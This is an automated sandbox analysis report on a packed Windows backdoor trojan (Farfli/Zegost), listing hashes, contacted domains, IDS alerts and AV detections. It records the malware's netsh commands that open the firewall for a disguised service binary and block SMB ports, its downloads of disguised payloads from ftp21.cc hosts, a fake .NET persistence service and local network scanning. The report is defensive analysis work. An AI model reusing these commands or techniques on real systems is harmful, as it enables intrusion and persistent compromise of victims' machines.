Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 1, 2024, 9:18 a.m.	July 1, 2024, 9:20 a.m.

Size	45.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5	`3d3aedfaeaf39544ff74fe6fe4541fc2`
SHA256	`d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71`
CRC32	`9CAA3147`
ssdeep	`768:XQ7R4nqTvoV22QbyMhOk9w+wRGtVEhq8C5eIdp5b4Fk0v5za:w4nVV22Q+mO0wrwVEUdpaFjv5G`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description)

wmi.jpg.exe "C:\Users\test22\AppData\Local\Temp\wmi.jpg.exe"
2564
- netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
  2628
- netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
  2680
- netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add policy name=Block
  2732
- netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add filterlist name=Filter1
  2792
- netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2856
- netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2916
- netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2972
- netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block
  3028
- netsh.exe "C:\Windows\System32\netsh.exe" ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
  744
- netsh.exe "C:\Windows\System32\netsh.exe" ipsec static set policy name=Block assign=y
  1728

Name	Response	Post-Analysis Lookup
www.362-com.com	A 1.226.84.135	1.226.84.135
unixtime.org	A 172.67.175.23 A 104.21.72.47	172.67.175.23
hook.ftp21.cc	A 211.108.60.155	211.108.60.155
www.4i7i.com	A 1.226.84.135	1.226.84.135
api6.my-ip.io
opendata.baidu.com	CNAME open.a.shifen.com A 45.113.194.127 A 45.113.194.189	45.113.194.127
download.microsoft.com	A 104.78.73.222 CNAME download.microsoft.com.edgekey.net CNAME dlc-shim.trafficmanager.net CNAME e12671.dscd.akamaiedge.net CNAME main.dl.ms.akadns.net	23.199.6.55
members.3322.org	CNAME members.3322.net A 118.184.169.48	118.184.169.48
down.ftp21.cc	A 119.203.212.165	119.203.212.165
web.362-com.com	A 110.11.158.238	110.11.158.238
ipv6-api.iproyal.com
ssl.ftp21.cc	CNAME cl-gl6dcaf7d1.gcdn.co A 31.184.207.62	31.184.207.62
gtxvdqvuweqs.com	A 16.162.201.176	16.162.201.176
152.134.208.175.in-addr.arpa
api.iproyal.com	A 93.189.62.83 A 193.228.196.69	93.189.62.83

IP Address	Status	Action
1.226.84.135	Active	Moloch
104.78.73.222	Active	Moloch
110.11.158.238	Active	Moloch
118.184.169.48	Active	Moloch
119.203.212.165	Active	Moloch
16.162.201.176	Active	Moloch
164.124.101.2	Active	Moloch
172.67.175.23	Active	Moloch
193.228.196.69	Active	Moloch
211.108.60.155	Active	Moloch
31.184.207.62	Active	Moloch
43.198.152.240	Active	Moloch
45.113.194.127	Active	Moloch
51.161.196.188	Active	Moloch
93.189.62.83	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 31.184.207.62:80 -> 192.168.56.101:49174	2014819	ET INFO Packed Executable Download	Misc activity
UDP 192.168.56.101:54148 -> 164.124.101.2:53	2027758	ET DNS Query for .cc TLD	Potentially Bad Traffic
TCP 31.184.207.62:80 -> 192.168.56.101:49174	2026537	ET HUNTING Suspicious EXE Download Content-Type image/jpeg	Potential Corporate Privacy Violation
TCP 31.184.207.62:80 -> 192.168.56.101:49174	2022053	ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2	A Network Trojan was detected
TCP 31.184.207.62:80 -> 192.168.56.101:49174	2023672	ET MALWARE JS/WSF Downloader Dec 08 2016 M4	A Network Trojan was detected
UDP 192.168.56.101:53004 -> 164.124.101.2:53	2027758	ET DNS Query for .cc TLD	Potentially Bad Traffic
TCP 211.108.60.155:80 -> 192.168.56.101:49176	2026537	ET HUNTING Suspicious EXE Download Content-Type image/jpeg	Potential Corporate Privacy Violation
TCP 211.108.60.155:80 -> 192.168.56.101:49176	2022053	ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2	A Network Trojan was detected
TCP 211.108.60.155:80 -> 192.168.56.101:49176	2023672	ET MALWARE JS/WSF Downloader Dec 08 2016 M4	A Network Trojan was detected
TCP 192.168.56.101:49286 -> 192.168.0.109:445	2001569	ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection	Misc activity
TCP 211.108.60.155:80 -> 192.168.56.101:49796	2026537	ET HUNTING Suspicious EXE Download Content-Type image/jpeg	Potential Corporate Privacy Violation
TCP 211.108.60.155:80 -> 192.168.56.101:49796	2022053	ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2	A Network Trojan was detected
TCP 211.108.60.155:80 -> 192.168.56.101:49796	2023672	ET MALWARE JS/WSF Downloader Dec 08 2016 M4	A Network Trojan was detected
UDP 192.168.56.101:53850 -> 8.8.8.8:53	2012171	ET INFO DYNAMIC_DNS Query to 3322.org Domain	Misc activity
TCP 211.108.60.155:80 -> 192.168.56.101:49998	2026537	ET HUNTING Suspicious EXE Download Content-Type image/jpeg	Potential Corporate Privacy Violation
TCP 192.168.56.101:51677 -> 192.168.0.56:1433	2001583	ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection	Misc activity
TCP 192.168.56.101:52794 -> 51.161.196.188:443	2038968	ET INFO SSH-2.0-Go version string Observed in Network Traffic	Misc activity
UDP 192.168.56.101:58166 -> 164.124.101.2:53	2027758	ET DNS Query for .cc TLD	Potentially Bad Traffic
TCP 192.168.56.101:55755 -> 192.168.0.101:135	2001581	ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection	Misc activity
UDP 192.168.56.101:57986 -> 164.124.101.2:53	2034196	ET INFO External IP Lookup Domain DNS Lookup (my-ip .io)	Potentially Bad Traffic
TCP 192.168.56.101:58804 -> 192.168.14.249:445	2001569	ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection	Misc activity
TCP 192.168.56.101:64311 -> 192.168.13.197:1433	2001583	ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49935 104.78.73.222:443	C=US, O=Microsoft Corporation, CN=Microsoft Azure RSA TLS Issuing CA 08	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=akamai.download.microsoft.com	2c:c1:3d:3d:70:5a:9a:56:25:7c:d3:41:93:bc:76:f2:78:8b:81:63
TLS 1.2 192.168.56.101:50023 93.189.62.83:443	C=US, O=Let's Encrypt, CN=E5	CN=api.iproyal.com	80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23
TLS 1.2 192.168.56.101:51486 93.189.62.83:443	C=US, O=Let's Encrypt, CN=E5	CN=api.iproyal.com	80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23
TLS 1.2 192.168.56.101:53840 93.189.62.83:443	C=US, O=Let's Encrypt, CN=E5	CN=api.iproyal.com	80:b8:bd:29:30:c8:ef:b5:55:c7:42:e5:cf:b8:4a:0e:ec:00:59:23
TLS 1.2 192.168.56.101:54343 193.228.196.69:443	C=US, O=Let's Encrypt, CN=E5	CN=api.iproyal.com	75:ce:fc:4e:72:d9:c8:06:65:40:3b:ca:5a:f6:97:bf:df:c3:e8:ae

Command line console output was observed (8 events)

Time & API	Arguments	Status	Return
WriteConsoleA July 1, 2024, 9:18 a.m.	buffer: Ok. console_handle: 0x00000007	1	1
WriteConsoleA July 1, 2024, 9:18 a.m.	buffer: Ok. console_handle: 0x00000007	1	1
WriteConsoleA July 1, 2024, 9:18 a.m.	buffer: ERR IPsec[05019] : console_handle: 0x00000007	1	1
WriteConsoleA July 1, 2024, 9:18 a.m.	buffer: Policy with name 'Block' does not exist console_handle: 0x00000007	1	1
WriteConsoleA July 1, 2024, 9:18 a.m.	buffer: ERR IPsec[05019] : console_handle: 0x00000007	1	1
WriteConsoleA July 1, 2024, 9:18 a.m.	buffer: Policy with name 'Block' does not exist console_handle: 0x00000007	1	1
WriteConsoleA July 1, 2024, 9:18 a.m.	buffer: Creating new Policy with name 'Block'... console_handle: 0x00000007	1	1
WriteConsoleA July 1, 2024, 9:18 a.m.	buffer: New Policy is created and updated successfully console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 1, 2024, 9:18 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://118.184.169.48/dyndns/getip
suspicious_features	Connection to IP address	suspicious_request	GET http://45.113.194.127/api.php?query=175.208.134.152&co=&resource_id=6006&oe=utf8
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://43.198.152.240:8080/api/node/ip_validate

Connects to a Dynamic DNS Domain (1 event)

domain

members.3322.org

Performs some HTTP requests (10 events)

request	GET http://ssl.ftp21.cc/445.jpg
request	GET http://hook.ftp21.cc/MpMgSvc.dll
request	GET http://hook.ftp21.cc/MpMgSvc.jpg
request	GET http://118.184.169.48/dyndns/getip
request	GET http://45.113.194.127/api.php?query=175.208.134.152&co=&resource_id=6006&oe=utf8
request	GET http://hook.ftp21.cc/Hooks.jpg
request	GET http://download.microsoft.com/download/E/4/1/E4173890-A24A-4936-9FC9-AF930FE3FA40/NDP461-KB3102436-x86-x64-AllOS-ENU.exe
request	GET http://hook.ftp21.cc/64.jpg
request	GET http://down.ftp21.cc/Update.txt
request	GET http://43.198.152.240:8080/api/node/ip_validate

Resolves a suspicious Top Level Domain (TLD) (3 events)

domain	ssl.ftp21.cc	description	Cocos Islands domain TLD
domain	down.ftp21.cc	description	Cocos Islands domain TLD
domain	hook.ftp21.cc	description	Cocos Islands domain TLD

Foreign language identified in PE resource (1 event)

name

RT_VERSION

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0001f05c

size

0x000003fc

Creates executable files on the filesystem (1 event)

file	C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe

Creates a service (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceA July 1, 2024, 9:18 a.m.	service_start_name: start_type: 2 password: display_name: .NET Runtime Optimization Service v3.0.30317_X86 filepath: C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe service_name: clr_optimization_v3.0.30317_32 filepath_r: C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe desired_access: 983551 service_handle: 0x002e1ff8 error_control: 1 service_type: 16 service_manager_handle: 0x002e1d50	1	3022840	0

A process created a hidden window (10 events)

Time & API	Arguments	Status	Return
ShellExecuteExW July 1, 2024, 9:18 a.m.	show_type: 0 filepath_r: netsh.exe parameters: advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow filepath: netsh.exe	1	1
ShellExecuteExW July 1, 2024, 9:18 a.m.	show_type: 0 filepath_r: netsh.exe parameters: advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow filepath: netsh.exe	1	1
ShellExecuteExW July 1, 2024, 9:18 a.m.	show_type: 0 filepath_r: netsh.exe parameters: ipsec static add policy name=Block filepath: netsh.exe	1	1
ShellExecuteExW July 1, 2024, 9:18 a.m.	show_type: 0 filepath_r: netsh.exe parameters: ipsec static add filterlist name=Filter1 filepath: netsh.exe	1	1
ShellExecuteExW July 1, 2024, 9:18 a.m.	show_type: 0 filepath_r: netsh.exe parameters: ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP filepath: netsh.exe	1	1
ShellExecuteExW July 1, 2024, 9:18 a.m.	show_type: 0 filepath_r: netsh.exe parameters: ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP filepath: netsh.exe	1	1
ShellExecuteExW July 1, 2024, 9:18 a.m.	show_type: 0 filepath_r: netsh.exe parameters: ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP filepath: netsh.exe	1	1
ShellExecuteExW July 1, 2024, 9:18 a.m.	show_type: 0 filepath_r: netsh.exe parameters: ipsec static add filteraction name=FilteraAtion1 action=block filepath: netsh.exe	1	1
ShellExecuteExW July 1, 2024, 9:18 a.m.	show_type: 0 filepath_r: netsh.exe parameters: ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1 filepath: netsh.exe	1	1
ShellExecuteExW July 1, 2024, 9:18 a.m.	show_type: 0 filepath_r: netsh.exe parameters: ipsec static set policy name=Block assign=y filepath: netsh.exe	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 1, 2024, 9:18 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 69632 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x10001000 process_handle: 0xffffffff	1	0	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0000ac00', u'virtual_address': u'0x00014000', u'entropy': 7.924912120479621, u'name': u'UPX1', u'virtual_size': u'0x0000b000'}

entropy

7.92491212048

description

A section with a high entropy has been found

entropy

0.966292134831

description

Overall entropy of this PE file is high

The executable is compressed using UPX (2 events)

section	UPX0				description	Section name indicates UPX
section	UPX1				description	Section name indicates UPX

Uses Windows utilities for basic Windows functionality (20 events)

cmdline	netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
cmdline	netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
cmdline	netsh.exe ipsec static add policy name=Block
cmdline	"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
cmdline	netsh.exe ipsec static add filterlist name=Filter1
cmdline	"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline	netsh.exe advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline	netsh.exe ipsec static add filteraction name=FilteraAtion1 action=block
cmdline	netsh.exe ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
cmdline	netsh.exe advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline	"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline	"C:\Windows\System32\netsh.exe" ipsec static add policy name=Block
cmdline	netsh.exe ipsec static set policy name=Block assign=y
cmdline	"C:\Windows\System32\netsh.exe" ipsec static set policy name=Block assign=y
cmdline	"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
cmdline	netsh.exe ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
cmdline	"C:\Windows\System32\netsh.exe" ipsec static add filterlist name=Filter1
cmdline	"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
cmdline	"C:\Windows\System32\netsh.exe" ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
cmdline	"C:\Windows\System32\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block

Connects to an IRC server, possibly part of a botnet

Communicates with host for which no DNS query was performed (2 events)

host	43.198.152.240
host	51.161.196.188

Installs itself for autorun at Windows startup (1 event)

service_name

clr_optimization_v3.0.30317_32

service_path

C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe

Operates on local firewall's policies and settings (4 events)

cmdline	"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline	netsh.exe advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline	netsh.exe advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow
cmdline	"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow

Generates some ICMP traffic

File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 out of 60 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Farfli.4!c
Elastic	malicious (moderate confidence)
MicroWorld-eScan	Gen:Heur.Mint.Zard.30
CAT-QuickHeal	Trojan.Aksula.A
Skyhigh	BehavesLike.Win32.Generic.pc
McAfee	Artemis!3D3AEDFAEAF3
Cylance	Unsafe
VIPRE	Gen:Heur.Mint.Zard.30
Sangfor	Suspicious.Win32.Save.a
K7AntiVirus	Trojan ( 0040f7ad1 )
BitDefender	Gen:Heur.Mint.Zard.30
K7GW	Trojan ( 0040f7ad1 )
Cybereason	malicious.aeaf39
Arcabit	Trojan.Mint.Zard.30
Baidu	Win32.Trojan.Farfli.bg
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Farfli.JU
APEX	Malicious
Avast	Win32:Evo-gen [Trj]
Cynet	Malicious (score: 100)
Kaspersky	UDS:Trojan.Win32.Generic
Alibaba	Backdoor:Win32/Zegost.24e518cf
Rising	Backdoor.Farfli!1.B6C5 (CLOUD)
Emsisoft	Gen:Heur.Mint.Zard.30 (B)
F-Secure	Trojan.TR/Crypt.FKM.Gen
DrWeb	Trojan.Siggen28.63414
Zillya	Trojan.Farfli.Win32.91278
TrendMicro	TROJ_GEN.R002C0DFL24
McAfeeD	Real Protect-LS!3D3AEDFAEAF3
Trapmine	malicious.moderate.ml.score
FireEye	Generic.mg.3d3aedfaeaf39544
Sophos	Mal/Behav-160
Ikarus	Backdoor.Win32.Zegost
Jiangmin	Trojan.Generic.hoagb
Google	Detected
Avira	TR/Crypt.FKM.Gen
Antiy-AVL	Trojan/Win32.Farfli
Kingsoft	malware.kb.b.888
Gridinsoft	Trojan.Win32.Agent.sa
Xcitium	Backdoor.Win32.Zegost.c@4m3x9i
Microsoft	Backdoor:Win32/Zegost!pz
ZoneAlarm	UDS:DangerousObject.Multi.Generic
GData	Gen:Heur.Mint.Zard.30
Varist	W32/KillAV.AU.gen!Eldorado
AhnLab-V3	Backdoor/Win.NG.R582744
BitDefenderTheta	AI:Packer.BC223D901F
DeepInstinct	MALICIOUS
VBA32	BScope.TrojanDDoS.Macri
Malwarebytes	Trojan.Farfli.UPX

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (50 out of 130 events)

dead_host	192.168.3.1:445
dead_host	192.168.3.120:135
dead_host	192.168.3.123:445
dead_host	192.168.3.119:445
dead_host	192.168.0.28:445
dead_host	192.168.0.65:445
dead_host	192.168.3.105:445
dead_host	192.168.3.109:445
dead_host	110.11.158.238:53
dead_host	192.168.3.142:445
dead_host	192.168.0.54:445
dead_host	192.168.3.121:445
dead_host	192.168.3.134:445
dead_host	192.168.3.120:1433
dead_host	192.168.0.200:445
dead_host	192.168.3.86:445
dead_host	192.168.0.188:445
dead_host	192.168.0.63:445
dead_host	192.168.0.36:445
dead_host	192.168.3.90:445
dead_host	192.168.56.101:51321
dead_host	192.168.56.101:50067
dead_host	192.168.0.64:445
dead_host	192.168.0.18:445
dead_host	192.168.0.204:445
dead_host	192.168.0.35:445
dead_host	192.168.0.87:445
dead_host	192.168.3.163:445
dead_host	192.168.3.166:445
dead_host	192.168.3.136:445
dead_host	192.168.56.101:52234
dead_host	192.168.3.97:445
dead_host	192.168.3.102:445
dead_host	192.168.56.101:54177
dead_host	192.168.56.101:54165
dead_host	192.168.56.101:49946
dead_host	192.168.0.104:445
dead_host	192.168.0.37:445
dead_host	192.168.0.58:445
dead_host	192.168.3.148:445
dead_host	192.168.3.1:1433
dead_host	192.168.3.122:1433
dead_host	192.168.56.101:54172
dead_host	192.168.0.19:445
dead_host	192.168.3.85:445
dead_host	192.168.3.128:445
dead_host	192.168.3.103:445
dead_host	192.168.56.101:52247
dead_host	192.168.3.89:445
dead_host	192.168.0.56:445

wmi.jpg.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All